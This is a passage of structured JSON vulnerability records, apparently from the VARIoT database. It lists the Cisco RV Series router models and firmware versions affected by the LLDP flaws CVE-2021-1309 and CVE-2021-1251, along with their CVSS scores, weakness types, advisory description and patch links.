            "version": "1.0.0.14"
          },
          {
            "model": "rv260w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv345p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv160",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv160w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv260p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv260",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv160w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv345p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv160",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv345p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv260p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv132w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv260p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv134w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv160",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv132w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv134w vdsl2 wireless-ac vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv132w adsl2+ wireless-n vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p dual wan gigabit poe vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "link layer discovery protocol",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1309"
          }
        ]
      },
      "cve": "CVE-2021-1309",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 8.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 6.5,
                "id": "CVE-2021-1309",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 8.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 6.5,
                "id": "CNVD-2021-35515",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2021-1309",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 7.4,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 2.8,
                "id": "CVE-2021-1309",
                "impactScore": 4.0,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Adjacent Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.8,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2021-1309",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1309",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1309",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1309",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-35515",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-441",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-1309",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1309"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-441"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1309"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1309"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent)",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1309"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1309"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1309",
            "trust": 3.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.1171.3",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-441",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1309",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1309"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-441"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1309"
          }
        ]
      },
      "id": "VAR-202104-0381",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          }
        ],
        "trust": 1.1394850175
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:37:02.714000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-multi-lldp-u7e4chCe",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe"
          },
          {
            "title": "Patch for Cisco Link Layer Discovery Protocol buffer overflow vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/265671"
          },
          {
            "title": "Cisco Link Layer Discovery Protocol Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147023"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-rv-multi-lldp-u7e4chCe"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1309"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-441"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-401",
            "trust": 1.0
          },
          {
            "problemtype": "Buffer error (CWE-119) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1309"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-multi-lldp-u7e4chce"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1309"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.1171.3"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/119.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1309"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-441"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1309"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1309"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-441"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1309"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-05-19T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          },
          {
            "date": "2021-04-08T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1309"
          },
          {
            "date": "2021-12-13T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "date": "2021-04-07T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-441"
          },
          {
            "date": "2021-04-08T04:15:12.063000",
            "db": "NVD",
            "id": "CVE-2021-1309"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-05-19T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-35515"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1309"
          },
          {
            "date": "2021-12-13T02:45:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          },
          {
            "date": "2022-08-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-441"
          },
          {
            "date": "2024-11-21T05:44:03.693000",
            "db": "NVD",
            "id": "CVE-2021-1309"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote or local",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-441"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Series router \u00a0 Buffer Error Vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005331"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-441"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202104-0377

    Vulnerability from variot - Updated: 2024-11-23 22:37

    Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent)

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0377",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv260w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv345p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv260",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv160",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv260p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv160w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv345p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv160",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv132w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv134w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv260p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv345",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv260w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv132w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv260",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv340w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv134w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv345",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv160w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.20"
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv134w vdsl2 wireless-ac vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv132w adsl2+ wireless-n vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p dual wan gigabit poe vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "link layer discovery protocol",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1251"
          }
        ]
      },
      "cve": "CVE-2021-1251",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 6.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.5,
                "id": "CVE-2021-1251",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.9,
                "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 6.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.5,
                "id": "CNVD-2021-26111",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.4,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 2.8,
                "id": "CVE-2021-1251",
                "impactScore": 4.0,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Adjacent Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.4,
                "baseSeverity": "High",
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "CVE-2021-1251",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "None",
